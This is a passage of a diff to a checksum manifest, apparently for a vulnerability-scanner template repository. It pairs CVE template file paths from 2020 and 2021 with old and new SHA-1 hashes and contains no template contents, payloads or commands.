http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:30d9b54e95437674a99934884c344346407aeb06 -http/cves/2020/CVE-2020-24186.yaml:0df340a998fd62977e1212168fc7630523b243aa +http/cves/2020/CVE-2020-24148.yaml:68cd11ce743eac9ed781b865de8a9d6f066af84e +http/cves/2020/CVE-2020-24186.yaml:6d6d875a225e3d8483cedea3d18be5d10eed6668 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 -http/cves/2020/CVE-2020-24312.yaml:b12e6e7427aab4161e503e980266b06e310e1b75 -http/cves/2020/CVE-2020-24391.yaml:4826fdb4cbc387091a4b6910c656ca28ee4fa8bb +http/cves/2020/CVE-2020-24312.yaml:64454cabae9f19c9ff900daf8206d16dcfd97091 +http/cves/2020/CVE-2020-24391.yaml:3cd35fe6417b0647ce50bbc4a16996c8c8981fb2 http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 -http/cves/2020/CVE-2020-24579.yaml:b14163aa9fd9a719222ab84fb26922cfcb6ec34f -http/cves/2020/CVE-2020-24589.yaml:c9ac42289b48867230e7a71e71a3ec15f13810fa -http/cves/2020/CVE-2020-24701.yaml:80a65cf66052fd8baf16135e65607ebe1a2414a1 -http/cves/2020/CVE-2020-24902.yaml:74db5481ad162517957f9532be52d35b10b4afb9 -http/cves/2020/CVE-2020-24903.yaml:aa2603a18720cf82736d7efcac16af5b78c66117 -http/cves/2020/CVE-2020-24912.yaml:813d76d812945969022e1f3d6cda02d99d103a61 +http/cves/2020/CVE-2020-24579.yaml:bd9a169a4c1af3ff65b5466200ab4d7989af7a04 +http/cves/2020/CVE-2020-24589.yaml:d26d02bb554d34740163c2cb502b03bd0bb108c0 +http/cves/2020/CVE-2020-24701.yaml:e39f30359517b3d238c0f047b7ded94881e69a14 +http/cves/2020/CVE-2020-24902.yaml:1259b4854191d05b01caa8d1b7f1e845b6cd04cf +http/cves/2020/CVE-2020-24903.yaml:89bf3a81d901c9d7364475f05800d40065327228 +http/cves/2020/CVE-2020-24912.yaml:a5df47738a105f4c07e66c50d21622c2fb4d8ed9 http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b -http/cves/2020/CVE-2020-25213.yaml:06724bab3f1553f0ee5d004d212384d823431886 -http/cves/2020/CVE-2020-25223.yaml:78d9e33f8f1920c4e6f4001dcd54556a79499b46 +http/cves/2020/CVE-2020-25213.yaml:cc2572578c2f5bf8269c6b208b3939987c2d18ef +http/cves/2020/CVE-2020-25223.yaml:b2c1068143116b03e67b909cb00887d396c28d92 http/cves/2020/CVE-2020-25495.yaml:046e0a535a8b9fd74f70e1ff2d90dbef6e20c658 -http/cves/2020/CVE-2020-25506.yaml:f85eeae591d25bb1e8d5f88cceed5a66c16a10ee -http/cves/2020/CVE-2020-2551.yaml:bd62e08c6adbd1c4966d7211913245d13fbbd0c0 -http/cves/2020/CVE-2020-25540.yaml:02142adf2e6fed198216c5c5acfc5e326991f584 +http/cves/2020/CVE-2020-25506.yaml:27620edd7c191f6c5f918ec2546c7de54e9124cb +http/cves/2020/CVE-2020-2551.yaml:2b7bf0bb7f84d06e15d8d41c964ad58491c0126f +http/cves/2020/CVE-2020-25540.yaml:b1b69542b3b044d72ae7f85052d20bd2922056eb http/cves/2020/CVE-2020-25780.yaml:3983db60c1ca28a8c7999041013ab96f5c896a9f -http/cves/2020/CVE-2020-25864.yaml:c1bdc0664f80de11fff27421237c0535e2f4471a +http/cves/2020/CVE-2020-25864.yaml:7ba0c416fbc580ffa8eb8f8fc337a77cd4a76b6c http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f http/cves/2020/CVE-2020-26153.yaml:455c58760238ddd079e51172072ef963e95e58ec -http/cves/2020/CVE-2020-26214.yaml:5f85dbd16a6a6d114db080f100a90520a476776a -http/cves/2020/CVE-2020-26217.yaml:96da67a423881f8fb5c4316f2b8bbd1c34f127bb +http/cves/2020/CVE-2020-26214.yaml:e15fb53018e98df0c349367eab19c2ae3d851d77 +http/cves/2020/CVE-2020-26217.yaml:8d3e7b139f7edff0496b2776f409f072bf153d55 http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 http/cves/2020/CVE-2020-26258.yaml:da846b0baeb41eb83b4c8ac05986b1eb0be6a1af -http/cves/2020/CVE-2020-26413.yaml:ca0dc80567bdd3117829bd8e18ea093db63620a9 +http/cves/2020/CVE-2020-26413.yaml:c6ae98d72b9daec71461b2c86159c469efa8fb32 http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 -http/cves/2020/CVE-2020-26948.yaml:78f28dda3b7f85105f54071d74b6bc355436bfa9 +http/cves/2020/CVE-2020-26948.yaml:cdadfb9ba6724ecfdd94740c729a0e0c443a3036 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:2f525b0f7a4ae60208a0da7dcc630c9822fded40 +http/cves/2020/CVE-2020-2733.yaml:a448094a7e74f2e3b6604186adbca425e3cec908 http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:500caabbd87e671d7091385a19c4040ea34c3784 -http/cves/2020/CVE-2020-27481.yaml:34dead4abe08a5b77da5e0f75b746ba0fae11a31 +http/cves/2020/CVE-2020-27467.yaml:e190b3c2d91f742f916a82030de9b4d8221b4e9b +http/cves/2020/CVE-2020-27481.yaml:1c6c8f8e84d22f9aa0ea5d634a3adff940839765 http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:09845d829da92f52ad39528ea72893106622646e -http/cves/2020/CVE-2020-27866.yaml:244c0b65ec85e620c013652da2ea6f378377d938 -http/cves/2020/CVE-2020-27982.yaml:aecf509f176fd6c8e7c487b487117399629aa3d3 -http/cves/2020/CVE-2020-27986.yaml:036d75b12b2e84ef9e8c9cc2eec3c3f92b87e57b -http/cves/2020/CVE-2020-28185.yaml:f1febab1b85d4233b3e72aa0d2719fa95708c8a6 -http/cves/2020/CVE-2020-28188.yaml:7b8274a1d7744a0a3751bdbbad8bf018231c9f67 -http/cves/2020/CVE-2020-28208.yaml:572cd573f91a14a49aafbe46ba917ab4fb22ad8d +http/cves/2020/CVE-2020-27838.yaml:f5d793dca6b37d410967a3a4c355b9aec9093594 +http/cves/2020/CVE-2020-27866.yaml:48b6550611c83a6d35f2437e66a0031e51f1930a +http/cves/2020/CVE-2020-27982.yaml:a1e9d4dd0d75d6209feb856df302363ff551e7d4 +http/cves/2020/CVE-2020-27986.yaml:c2668ca4f159f3302764e6c01bfb8b0303aed21b +http/cves/2020/CVE-2020-28185.yaml:2dca6d757d0230f6e3c009fd75d047a5c2d41c07 +http/cves/2020/CVE-2020-28188.yaml:9328f627c742f2eba1355c3f32f933281654dfb4 +http/cves/2020/CVE-2020-28208.yaml:17f8f9f3851d089ed3ba72296ebb1901169322b4 http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:86f474bb8d7bf2e7681e261a4b18a4f3d5dde805 +http/cves/2020/CVE-2020-28871.yaml:67720a0089ca532649039c13100df95c7a7bc194 http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 -http/cves/2020/CVE-2020-29164.yaml:78b7cbf695b31728ea725272c47836d48e8d9c1f -http/cves/2020/CVE-2020-29227.yaml:7aae495d9f31d8b89aa729114fc84b8ec90b261e -http/cves/2020/CVE-2020-29284.yaml:f0ab6a4525f226698c518fa2dd197052ada04595 -http/cves/2020/CVE-2020-29395.yaml:c9356abe925071b30dd95d153a4f17b2c0d91fd3 +http/cves/2020/CVE-2020-29164.yaml:a7821d97ab89dafa618381c5df70b60fd8657b44 +http/cves/2020/CVE-2020-29227.yaml:122475843b9e415cf59e2ed0b4dc9b2ac9c00cb4 +http/cves/2020/CVE-2020-29284.yaml:20abe2012386881cc230cd068b1fe4084fc25f5b +http/cves/2020/CVE-2020-29395.yaml:b0aa043c5646021dc76bb08b9b1e1ba1f8a569bc http/cves/2020/CVE-2020-29453.yaml:36f8bba4fdee54e96e54f2132471c8bddf38fdb9 -http/cves/2020/CVE-2020-29583.yaml:28807dae67b58b07d4ef1d9489d52712220bc6bf +http/cves/2020/CVE-2020-29583.yaml:1eb6c3ab90222daf4aa8b2b2599b0d11e7db9086 http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 -http/cves/2020/CVE-2020-3452.yaml:ac8abaf42a386b4a553ca6b67a8503127d95c03a -http/cves/2020/CVE-2020-35234.yaml:6ea1a63fa01e3e96a6c1c8c3d6f2606d28b674f9 -http/cves/2020/CVE-2020-35338.yaml:84030a349ba5130c8e46ba857b4ce6446430168c -http/cves/2020/CVE-2020-35476.yaml:409ea669737df2f38110b767efcaff63c57df28d -http/cves/2020/CVE-2020-35489.yaml:dec219f1d8f0827e62cb6541a6e8c0dcfc1824f6 -http/cves/2020/CVE-2020-35580.yaml:328a051b2509ed190e2932f49eff871fbb4a9e5f -http/cves/2020/CVE-2020-35598.yaml:9657326a3e65b7c9812d05b6926b98d2f6786430 -http/cves/2020/CVE-2020-35713.yaml:1e2ddca44761e0a5a52e8c51a7693291a8a78166 +http/cves/2020/CVE-2020-3452.yaml:462a13a55603fea601a5eb04361ebb262a5ae885 +http/cves/2020/CVE-2020-35234.yaml:e4bb78015e568be11dc80c12b7f7c6482b2ba820 +http/cves/2020/CVE-2020-35338.yaml:41c7d218db18df546ef3f07ef88cf08fa1fa7d5c +http/cves/2020/CVE-2020-35476.yaml:26ffaf11a97ed264f91c9bf66bb10aa8a5e34c80 +http/cves/2020/CVE-2020-35489.yaml:1f8813c310acbbae92d71094491480f81093c9a1 +http/cves/2020/CVE-2020-35580.yaml:752ba7e807215ff1529be07163304e5a8ea77681 +http/cves/2020/CVE-2020-35598.yaml:fa4d75367df143b4d76d19189fb76471e81fb318 +http/cves/2020/CVE-2020-35713.yaml:04bd22c97e914a61aa173271bcc13b87474b2cd0 http/cves/2020/CVE-2020-35729.yaml:c7598a948f72654439744155ace7dfe699bba00b -http/cves/2020/CVE-2020-35736.yaml:04704013756f8f1485432e4cadbc9660a421c3d8 +http/cves/2020/CVE-2020-35736.yaml:0595a14d942c7a19718ad31a79b197ca18066615 http/cves/2020/CVE-2020-35749.yaml:8c7c7cb6375f279b172fd6db9e37182ff10b0d3d http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f -http/cves/2020/CVE-2020-3580.yaml:696b0e39d81f0862777d8df4d18fd4d7a2fff9b0 -http/cves/2020/CVE-2020-35846.yaml:00456720e23642764af469731d595e94e6bc18a0 -http/cves/2020/CVE-2020-35847.yaml:b686652e29308d9b9881239e1cc13effa32c980a -http/cves/2020/CVE-2020-35848.yaml:6271501b7f85396c06fb139352bd7a631f5cf73c +http/cves/2020/CVE-2020-3580.yaml:5c17b9207ede49ea379376451f152493405eff3b +http/cves/2020/CVE-2020-35846.yaml:ad9de8cafbad528bd0f4f922e27014c92520ac09 +http/cves/2020/CVE-2020-35847.yaml:4636a8b6bdb0fe4822f990c002df088e792e6c63 +http/cves/2020/CVE-2020-35848.yaml:3afcd9e68aebe83507ece244d39fd96365f70338 http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd -http/cves/2020/CVE-2020-35984.yaml:4278c822236b24641a6008d1b7782ad9418b2ea2 -http/cves/2020/CVE-2020-35985.yaml:492b98abfcee22e2acfff34e597ade82696296d1 -http/cves/2020/CVE-2020-35986.yaml:96a23047c7e1a64cad1eb611a264a1f206b405c2 -http/cves/2020/CVE-2020-35987.yaml:f931d41361de5b89071b6172a88d5a7a13805a82 -http/cves/2020/CVE-2020-36112.yaml:23ce3f6b15cfdd9701f981ab2c556e52049715fd -http/cves/2020/CVE-2020-36289.yaml:4524594df1256ccf61dd15df6dd9dd4aa128d797 -http/cves/2020/CVE-2020-36365.yaml:871f5fcd44da634196c2988f8099e0f8060a391f +http/cves/2020/CVE-2020-35984.yaml:93e524409cf0b23db0b70db6f0094cfba52efb13 +http/cves/2020/CVE-2020-35985.yaml:ce48524c08b761ebcc575ef02765314669b5b30d +http/cves/2020/CVE-2020-35986.yaml:c76e52d22ba5e6d8fcc101ed81be8d25dce67962 +http/cves/2020/CVE-2020-35987.yaml:8d0b095e54b481e7d92d1a54504349d00471b8b1 +http/cves/2020/CVE-2020-36112.yaml:f2bf094fac8f1cdfe6a1a346cdbe6be8c7601124 +http/cves/2020/CVE-2020-36289.yaml:d297dd28860670463adcfcf6672f82e9faa1eadc +http/cves/2020/CVE-2020-36365.yaml:9a13b03b380ad3e190bfe456dd8c9e3628778dd2 http/cves/2020/CVE-2020-36510.yaml:43288de50cb0daa7560d3c49ab9cb662ec943aaa -http/cves/2020/CVE-2020-4463.yaml:11b5d85cc0e83f550006b8bf0d6cc0a6407490bd -http/cves/2020/CVE-2020-5191.yaml:bbbfdc55968de598c727dc69b25e20dca1344a80 -http/cves/2020/CVE-2020-5192.yaml:04c9004b000491bcf959be292298a2bc9e52033c -http/cves/2020/CVE-2020-5284.yaml:92aab171880d0c49c754162851b66e9a1947823d +http/cves/2020/CVE-2020-4463.yaml:ba0839c3361367e1ce876c8964a18fd9822b4c18 +http/cves/2020/CVE-2020-5191.yaml:0f273b6b9bfac5701e3dda3504bd7f642d9265fb +http/cves/2020/CVE-2020-5192.yaml:b186c3cb44c730fb83ebafec8bdc72e706e559a1 +http/cves/2020/CVE-2020-5284.yaml:e0f1b069ab0fc3bc4860d6f29c8b66e56fd6c17c http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 -http/cves/2020/CVE-2020-5410.yaml:b3d892f8caa9a9dc7ae499ae3846ea95bcd259b7 +http/cves/2020/CVE-2020-5410.yaml:ee5446048d5570981b1f589cfb8ac45765961762 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c http/cves/2020/CVE-2020-5776.yaml:ddddb7cd7126aa41e107c0211722da5abebeb87f -http/cves/2020/CVE-2020-5777.yaml:a7535c371c0fe0706c73037a47b12de19ce5794d +http/cves/2020/CVE-2020-5777.yaml:fb86884641fca57dacff56448df790c077a8016b http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:2520f1d294f8a81758197f7daff7c8e0be670066 -http/cves/2020/CVE-2020-6171.yaml:bb35d476070fef94d784cd0a23d602db49328d02 -http/cves/2020/CVE-2020-6207.yaml:3bf92a4fd7c258c5bb6b938b94ab2b5f5a5a0fb8 -http/cves/2020/CVE-2020-6287.yaml:2edcf5c74a421df1ac9219cb68298dbcb2fe7470 +http/cves/2020/CVE-2020-5902.yaml:fd6fead0ec016d1c3250bd3639df8aa3e3d7a3c6 +http/cves/2020/CVE-2020-6171.yaml:3b54178dd588febab96bc70b34ec3a9684031593 +http/cves/2020/CVE-2020-6207.yaml:88f82f2f4117df59a21bee30dabc2dbbbd55752a +http/cves/2020/CVE-2020-6287.yaml:7a1d843909ee9d794e9e8c541625d5522d360537 http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:457b0ab917393f60b1e81126c83e7d5115c17d52 -http/cves/2020/CVE-2020-6950.yaml:edaec70c14663353167510b6114895064ab7731b -http/cves/2020/CVE-2020-7107.yaml:0883f31e3f93de49c77c8038e650b46fdfaa6222 -http/cves/2020/CVE-2020-7136.yaml:6cb8a43e73fd9cb8f5b9dcef3f499941f013951c +http/cves/2020/CVE-2020-6637.yaml:028c3cea7cb4b979332c21866571714765fc3eda +http/cves/2020/CVE-2020-6950.yaml:fd7c7f30283610f8b86244eb4b0849da960e6e2e +http/cves/2020/CVE-2020-7107.yaml:1214b3094b6e6ac77539f71ee51c3585315222d8 +http/cves/2020/CVE-2020-7136.yaml:dc5c71c2c26cb8517198425acbdf352592e05265 http/cves/2020/CVE-2020-7209.yaml:0f6026d48cd89d6faa187af05d42c9518f7a48ae -http/cves/2020/CVE-2020-7318.yaml:8eb4d4ceca2e89ba39c77e6de650bfcfb4973af0 -http/cves/2020/CVE-2020-7796.yaml:3d10416f40c7f342301d5e2d3eb8be37ed377db1 -http/cves/2020/CVE-2020-7943.yaml:6c48b1bea21ccff1be86ecfc9ba9e3bc76c07794 -http/cves/2020/CVE-2020-7961.yaml:ddc3ea036c1c6429bfe3ee5b62bbd645e6514c66 -http/cves/2020/CVE-2020-7980.yaml:86d8d7f9eec530b603c8bc9217987daa02ce29f8 -http/cves/2020/CVE-2020-8115.yaml:6da07e069a340ef3b0ec0158d64f8f60768b00c1 -http/cves/2020/CVE-2020-8163.yaml:e0220eb7c18de2dc249930fa071c65840fd5c5e5 -http/cves/2020/CVE-2020-8191.yaml:63ca6d389cb61a449922c860de0d0a2bcb06634d -http/cves/2020/CVE-2020-8193.yaml:3434281d9705a6964efceb43e95704d3a8367669 +http/cves/2020/CVE-2020-7318.yaml:0ee84af039d5d27f45bc0ce4a628b2550a80fd8e +http/cves/2020/CVE-2020-7796.yaml:f4b073f23fbc79d82d2d3701ea96ec2904587faa +http/cves/2020/CVE-2020-7943.yaml:7c1a1baf25d423ad09a63cd8e4c6930d58ed9626 +http/cves/2020/CVE-2020-7961.yaml:63a1bbbdf1b6a0a9e831502b6f6cadf992fc043e +http/cves/2020/CVE-2020-7980.yaml:becc3ce799e1d9d704840752e31c1b38ac0f651b +http/cves/2020/CVE-2020-8115.yaml:5783f92b5ccedceb0c259e03cca80fd47053a915 +http/cves/2020/CVE-2020-8163.yaml:f470d2d3016a962f7ec590d77b19a43f6acadb88 +http/cves/2020/CVE-2020-8191.yaml:6ed1e734ec2ee564f2b11700bc59380222121485 +http/cves/2020/CVE-2020-8193.yaml:c730b189267de57e03a336d73fda9c22c435b30e http/cves/2020/CVE-2020-8194.yaml:1799ec8f9624c47809dedd73f5a2d22aaa20f638 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 -http/cves/2020/CVE-2020-8497.yaml:d50899731199c0c1938709b0e5a9d6576a542543 -http/cves/2020/CVE-2020-8512.yaml:07b638a4ae7db2a3f6c3ffbb48704bb6a9a0d828 -http/cves/2020/CVE-2020-8515.yaml:7fa503f9ede1cebdf0def1ab5e9200f931866ef4 -http/cves/2020/CVE-2020-8615.yaml:60e99101d1611bccf4a625fb1684dbbdd94217be -http/cves/2020/CVE-2020-8641.yaml:87d4b65a1ce6656f16db7df50b851e1d68f7cfd7 -http/cves/2020/CVE-2020-8644.yaml:ee6ee536cd78dd7df3e019f8cf15e9390ac91be3 +http/cves/2020/CVE-2020-8497.yaml:cdb905b1cb4a6db55e8a6da868be8a91f09d33d6 +http/cves/2020/CVE-2020-8512.yaml:4a6489520aee40a14b3f2c70b30a28b209ee05d1 +http/cves/2020/CVE-2020-8515.yaml:60a9f0e5cf482b2abf522834d95875baf33f29ac +http/cves/2020/CVE-2020-8615.yaml:f4732edfed404f9be43debf22e295605eab2e532 +http/cves/2020/CVE-2020-8641.yaml:8d361c6ac6ea6a97bc24fbe5a8e69df0cf5ff73a +http/cves/2020/CVE-2020-8644.yaml:08ca5cfa9de25d11eff7521ad38f5279e686c141 http/cves/2020/CVE-2020-8654.yaml:86969023c0fb1d0f7e502880eb4ead28b3b5cd5d http/cves/2020/CVE-2020-8771.yaml:fdbf80c1219ed77aa813cdea75224fc0e0437e11 -http/cves/2020/CVE-2020-8772.yaml:7f882131550398901bee34a3f5ad985c4d6edfbb -http/cves/2020/CVE-2020-8813.yaml:312c01ad563809b3d15c5b3bf351a5e5955dc008 -http/cves/2020/CVE-2020-8982.yaml:a1c3b9f3206b71851d546ae3524b20fc25835f94 -http/cves/2020/CVE-2020-9036.yaml:bd3242d043e8aa13663d87d414aae3de5fb485ba +http/cves/2020/CVE-2020-8772.yaml:b6fec3222c262217a8cf5bba125b4298ebe5c279 +http/cves/2020/CVE-2020-8813.yaml:9eb88a961a0eacb2e81e33e6cf79ac190a2bf1f6 +http/cves/2020/CVE-2020-8982.yaml:01d3456ee84b4be1c04f9a48fdf3e521ea32ba80 +http/cves/2020/CVE-2020-9036.yaml:8f1109d1da947a0ad8562a105d79c5933d0db5cb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 http/cves/2020/CVE-2020-9054.yaml:c9e18ac60edbecec09d912db77f833b45b70ed7c -http/cves/2020/CVE-2020-9315.yaml:0a59530d44f12702c60747c7b5aa06bca991c32a -http/cves/2020/CVE-2020-9344.yaml:db98ff60deb8b268c575bf4b8d2312a3a517a360 -http/cves/2020/CVE-2020-9376.yaml:ce3538b7b3c9e8080041e9719ca749031e1056ca -http/cves/2020/CVE-2020-9402.yaml:7b3d964c0f2ed4cea7475ed18f71172c171bb471 -http/cves/2020/CVE-2020-9425.yaml:648f9b42eebc009268de5474693749cadee112e3 +http/cves/2020/CVE-2020-9315.yaml:1900cca1d2d418d09656c586bc4718699fa72a12 +http/cves/2020/CVE-2020-9344.yaml:a89bced51c825a39641d826e6de466e04cedb222 +http/cves/2020/CVE-2020-9376.yaml:9136255705fdee1fea7913b09adaeb0cdfd83458 +http/cves/2020/CVE-2020-9402.yaml:398e68e2cbce9d105785e1d3cbd98056162eb439 +http/cves/2020/CVE-2020-9425.yaml:49b1c59803a7cc4378e6bfa690f375ad95855d10 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:bb643025fc1bb0b2de42da7158e1cf70093e0840 -http/cves/2020/CVE-2020-9496.yaml:ba585628d3f5c005c1aa634c4344b770821d6230 -http/cves/2020/CVE-2020-9757.yaml:bdbd5638a9f422f128feeed8281a980683cb1111 -http/cves/2021/CVE-2021-1472.yaml:d1b1e41c111e4320a66a15a2f405a48300618dce +http/cves/2020/CVE-2020-9484.yaml:a5952e10d76346826ec105f1e756ac44c270ee63 +http/cves/2020/CVE-2020-9496.yaml:85cf814c38c7240d6138f8f2969931e1c21589cc +http/cves/2020/CVE-2020-9757.yaml:1e71acf8ed2a354d230ed4b9f2c4683ce6a6a0cb +http/cves/2021/CVE-2021-1472.yaml:9fc6a2d166c5f4420df34e0797fe64cb79ce5ecd http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 -http/cves/2021/CVE-2021-1498.yaml:c630664a2b59cabcbb5f213a099df9ba4b229683 -http/cves/2021/CVE-2021-1499.yaml:bf9c05ab6320c875a9addc9f91a59665a173a280 -http/cves/2021/CVE-2021-20031.yaml:fcee5c484b93dc955534fab6342aef46c47ee2a4 +http/cves/2021/CVE-2021-1498.yaml:f77f639b7bd67b05d7e4aae346e07a35bb1515bd +http/cves/2021/CVE-2021-1499.yaml:4cfb5a4971a96a3ea7449540cd2a674f8c416f3b +http/cves/2021/CVE-2021-20031.yaml:2a1693e374980b54e233b120122f40613907a67b http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf -http/cves/2021/CVE-2021-20091.yaml:acda7214538f03012e8749fcccc3fdef02be0e18 +http/cves/2021/CVE-2021-20091.yaml:1da951bf5a65bfe6f2a7704de42df7a91bd73b3c http/cves/2021/CVE-2021-20092.yaml:cafad84bd12f41f09da4a823b1b68585a5e63051 -http/cves/2021/CVE-2021-20114.yaml:56c858fb0b43e28abcff788f9c95861c14e8754d -http/cves/2021/CVE-2021-20123.yaml:028e72704112e159c4705ca34fb017fafd5850f9 -http/cves/2021/CVE-2021-20124.yaml:b74032f260a4144131f377cf8c302e9e5502930c -http/cves/2021/CVE-2021-20137.yaml:329f5003851ff0115bb2c57bdb3ef3d2cc798fd6 -http/cves/2021/CVE-2021-20150.yaml:e91b3bf2efe60e6c5c828010cc1f2bfee24d02e2 -http/cves/2021/CVE-2021-20158.yaml:1e9379b02533bc87ce8346b3692f541e864eb987 -http/cves/2021/CVE-2021-20167.yaml:cf0786884661d7cd896a4baeead0c509cf488448 -http/cves/2021/CVE-2021-20323.yaml:c706258b1f2b4c2d50d11104f817d2d7c9832064 -http/cves/2021/CVE-2021-20792.yaml:1134c3811e5f3ce90ddf56ba50363e9540c698ff -http/cves/2021/CVE-2021-20837.yaml:54787f4213f6a7a69e7ab1f253daa75823acdc86 -http/cves/2021/CVE-2021-21087.yaml:0926472430cb913df5560b207a233dba27bcdbb8 -http/cves/2021/CVE-2021-21234.yaml:d1ed5df584a1a449c5f7dcc1212969b288eee8a3 -http/cves/2021/CVE-2021-21287.yaml:c8f72f297f3cebba558775e599d82fae0eef72d5 -http/cves/2021/CVE-2021-21307.yaml:708322a0156240c58bde0e08efde0eb3c63b61be -http/cves/2021/CVE-2021-21311.yaml:49c07df35ce3f1b27711d1b11ac1dde8bcee4241 +http/cves/2021/CVE-2021-20114.yaml:aefc50a43542667e567e801325efdfb7160044ad +http/cves/2021/CVE-2021-20123.yaml:c518f9a5a37e85cfe1c46b32ca52e73c0692747b +http/cves/2021/CVE-2021-20124.yaml:abb973e39dd6f5dce5d12dcc4ad33f22e689a4e1 +http/cves/2021/CVE-2021-20137.yaml:0daaa379a978d0428366623ff2aef851212c9f21 +http/cves/2021/CVE-2021-20150.yaml:075cd5dda8786ace5a3df71e55bdf025602c91da +http/cves/2021/CVE-2021-20158.yaml:e7060d25815d287630f615da2bc2bc16797cf003 +http/cves/2021/CVE-2021-20167.yaml:18e9d41d4ccf3a94d4037bd1b023ee8b13a38f7e +http/cves/2021/CVE-2021-20323.yaml:00fb4bd0630e78aa9c940d8eca1feae7081f925f +http/cves/2021/CVE-2021-20792.yaml:35ff7b8aad2ef0641a3118a0ac5943a40b7ce110 +http/cves/2021/CVE-2021-20837.yaml:5779476dc1adc4d80f2ebcc5c85323117c40f6a4 +http/cves/2021/CVE-2021-21087.yaml:b4a4f6e73ea548e793410fa0833fa9ddddbb2271 +http/cves/2021/CVE-2021-21234.yaml:3bebd96604bdc88a51c32a98c2b2bb9ecba0966a +http/cves/2021/CVE-2021-21287.yaml:55c45e7817d18159e21800f1e1794f26c86cdd3d +http/cves/2021/CVE-2021-21307.yaml:a058a2356df9e6607e9f8ae975812945caee9873 +http/cves/2021/CVE-2021-21311.yaml:0154798d24b10664dd98db0008b371a50f227d61 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 -http/cves/2021/CVE-2021-21351.yaml:9146711bbec2428b87492f9dfb27cf96571cd0e0 -http/cves/2021/CVE-2021-21389.yaml:5697547e1529a51c0afeff22cf019ebfec6cf04d -http/cves/2021/CVE-2021-21402.yaml:0a42f04d55aa5eda68d49c3cc6f65ec4afb1ba6f +http/cves/2021/CVE-2021-21351.yaml:8e68e655d6102eb88dd246bfb3561d50ebf1eafd +http/cves/2021/CVE-2021-21389.yaml:a0f10bdb842da5078c37a9afacd6a602c0732546 +http/cves/2021/CVE-2021-21402.yaml:e64c2bf5425996ff22209077460cc2413d15aa9d http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca -http/cves/2021/CVE-2021-21745.yaml:7feb1570c2126860efa23bdac1a58d2b58a65684 -http/cves/2021/CVE-2021-21799.yaml:4464d72b3dd679910ef105f2ef9b8b5d6e4a4971 -http/cves/2021/CVE-2021-21800.yaml:b76cd8a9f31341a8b260e83e46698129a977ab53 -http/cves/2021/CVE-2021-21801.yaml:f64b9221773cc64fb581df2f4f210e1fb36cb932 -http/cves/2021/CVE-2021-21802.yaml:1edfedd9a2ed38e9b05b9d70505c1e5ac3287042 -http/cves/2021/CVE-2021-21803.yaml:3e9cbe6e737795f4cb639896ba89ec9181f88c53 -http/cves/2021/CVE-2021-21805.yaml:d8ccf425e42057a5f8d4877ab7dcc1fc1dd1101c +http/cves/2021/CVE-2021-21745.yaml:da13fdae366d46db22003811aea9e87376765b7f +http/cves/2021/CVE-2021-21799.yaml:0fe83549d591a70959d82ae6cd8e487286176d5a +http/cves/2021/CVE-2021-21800.yaml:14ccc1c341b59710236dfafec5ff26f606a95d84 +http/cves/2021/CVE-2021-21801.yaml:940ff78b6102645d3a0f528bb0521b958e225031 +http/cves/2021/CVE-2021-21802.yaml:b858969ae45c1ae53fbbf227e63415f6b6b1a06e 